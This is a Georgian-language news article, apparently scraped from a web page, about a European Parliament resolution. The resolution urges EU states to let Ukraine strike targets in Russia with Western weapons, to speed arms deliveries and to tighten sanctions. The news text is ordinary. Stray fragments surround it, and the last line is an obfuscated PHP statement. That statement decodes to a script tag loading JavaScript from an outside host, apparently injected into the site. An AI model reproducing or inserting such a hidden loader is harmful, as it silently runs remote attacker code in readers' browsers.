celsiusi
ავერსი საქკაბელი

 ევროპარლამენტი ევროკავშირის წევრ ქვეყნებს მოუწოდებს, უკრაინას მისცენ უფლება, გამოიყენოს დასავლური იარაღი რუსეთში ლეგიტიმური სამიზნეების წინააღმდეგ, – ამის შესახებ ნათქვამია ევროპარლამენტის მიერ მიღებულ რეზოლუციაში.

რეზოლუციას 425-მა დეპუტატმა დაუჭირა მხარი, წინააღმდეგ 131-მა მისცა ხმა, ხოლო 63-მა ევროპელმა კანონმდებელმა თავი შეიკავა.

რეზოლუციის ტექსტში ნათქვამია, რომ იარაღის გამოყენებაზე შეზღუდვების მოხსნის გარეშე უკრაინა სრულად ვერ იყენებს  თავდაცვის უფლებას და თავისი მოსახლეობასა და ინფრასტრუქტურაზე თავდასხმების წინაშე მოწყვლადი რჩება. პარლამენტის წევრები აღნიშნავენ, რომ სამხედრო დახმარების არასაკმარისი მიწოდება და მათი გამოყენების შეზღუდვა ამ დრომდე გაწეულ ძალისხმევაზე უარყოფითად აისახება.

ამასთან, დეპუტატები მოუწოდებენ ევროკავშირის წევრ ქვეყნებს, შეასრულონ 2023 წლის მარტში აღებული ვალდებულება უკრაინისთვის ერთი მილიონი ჭურვის მიწოდებასთან დაკავშირებით და დააჩქარონ შეიარაღების, საჰაერო თავდაცვის სისტემებისა და სხვა აღჭურვილობის მიწოდება.

რეზოლუციაში ევროპარლამენტის წევრები ასევე მოუწოდებენ ევროკავშირის ქვეყნებს, შეინარჩუნონ და გააფართოონ სანქციები რუსეთის, ბელარუსისა და ევროკავშირის არაწევრი ქვეყნებისა და კომპანიების წინააღმდეგ, რომლებიც რუსეთს სამხედრო და ტექნოლოგიურ დახმარებას უწევენ.

ევროპარლამენტის წევრები აღნიშნავენ, რომ გმობენ ირანის მიერ რუსეთისთვის ბალისტიკური იარაღის მიწოდებას და თეირანისა და ფხენიანის წინააღმდეგ სანქციების გამკაცრებას ითხოვენ. ევროპარლამენტი მოუწოდებს ევროკავშირს და მის წევრ სახელმწიფოებს, აქტიურად იმუშაონ უკრაინის საერთაშორისო მხარდაჭერის გასაძლიერებლად და ომის მშვიდობიანი დარეგულირების გზების განსასაზღვრად. ამავე დროს ევროპარლამენტის დეპუტატები აღნიშნავენ, რომ კონფლიქტის დარეგულირების ნებისმიერი გზა უნდა ეფუძნებოდეს უკრაინის დამოუკიდებლობის, სუვერენიტეტისა და ტერიტორიული მთლიანობის პატივისცემას.

109
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");